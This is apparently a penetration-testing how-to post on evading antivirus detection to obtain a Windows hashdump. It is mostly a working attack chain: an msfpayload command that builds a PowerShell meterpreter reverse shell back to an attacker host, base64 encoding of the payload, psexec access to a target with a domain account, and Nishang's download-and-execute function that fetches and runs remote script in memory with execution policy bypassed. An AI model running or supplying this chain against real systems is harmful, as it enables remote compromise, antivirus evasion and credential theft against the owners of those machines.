avoiding AV detection
I'd like to try a more sophisticated way of gathering the hashdump.
With many thanks to:
http://0entropy.blogspot.co.uk/2012/04/powershell-metasploit-meterpreter-and.html
https://www.fishnetsecurity.com/6labs/blog/bypassing-antivirus-powershell
We Need 3 machines for this
- metasploit (Kali)
- Windows with powershell
- The final target (Windows Server)
On Kali:
Create a PowerShell meterpreter
msfpayload windows/meterpreter/reverse_tcp LHOST=[IP of Kali] LPORT=443 R | msfencode -t psh -a x86
On the PowerShell machine
Convert the PS meterpreter Shell to the right Format:
c:\> powershell
PS c:\> $cmd = 'PASTE THE CONTENTS OF THE PSH SCRIPT HERE'
PS c:\> $u = [System.Text.Encoding]::Unicode.GetBytes($cmd)
PS c:\> $e = [Convert]::ToBase64String($u)
PS c:\> $e
Put this output as a file into an webserver directory on Kali and make sure you can Access/download it
Now get to the target:
c:\> psexec \\[Target] -u domain\jdoe cmd.exe
Create bewlo PS script that downloads and executes your script from Kali and executes it in Memory. (Thanks to Nishang)
function Download-Execute-PS { <# .SYNOPSIS Nishang Payload which downloads and executes a powershell script. .DESCRIPTION This payload downloads a powershell script from specified URL and then executes it on the target. Use the -nowdownload option to avoid saving the script on the target. Otherwise, the script is saved with a random filename. .PARAMETER ScriptURL The URL from where the powershell script would be downloaded. .PARAMETER Arguments The Arguments to pass to the script when it is not downloaded to disk i.e. with -nodownload function. This is to be used when the scripts load a function in memory, true for most scripts in Nishang. .PARAMETER Nodownload If this switch is used, the script is not dowloaded to the disk. .EXAMPLE PS > Download-Execute-PS http://pastebin.com/raw.php?i=jqP2vJ3x .EXAMPLE PS > Download-Execute-PS http://script.alteredsecurity.com/evilscript.ps1 -Argument evilscript -nodownload The above command does not download the script file to disk and executes the evilscript function inside the evilscript.ps1 .LINK http://labofapenetrationtester.com/ https://github.com/samratashok/nishang #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $True)] [String] $ScriptURL, [Parameter(Position = 1, Mandatory = $False)] [String] $Arguments, [Switch] $nodownload ) if ($nodownload -eq $true) { Invoke-Expression ((New-Object Net.WebClient).DownloadString("$ScriptURL")) if($Arguments) { Invoke-Expression $Arguments } } else { $rand = Get-Random $webclient = New-Object System.Net.WebClient $file1 = "$env:temp\$rand.ps1" $webclient.DownloadFile($ScriptURL,"$file1") $script:pastevalue = powershell.exe -ExecutionPolicy Bypass -noLogo -command $file1 Invoke-Expression $pastevalue } }
Call this script to download and run your reverse Shell:
Download-Execute-PS http://[Kali]/ps.txt
Go to your Kali and ejoy the reverse Shell....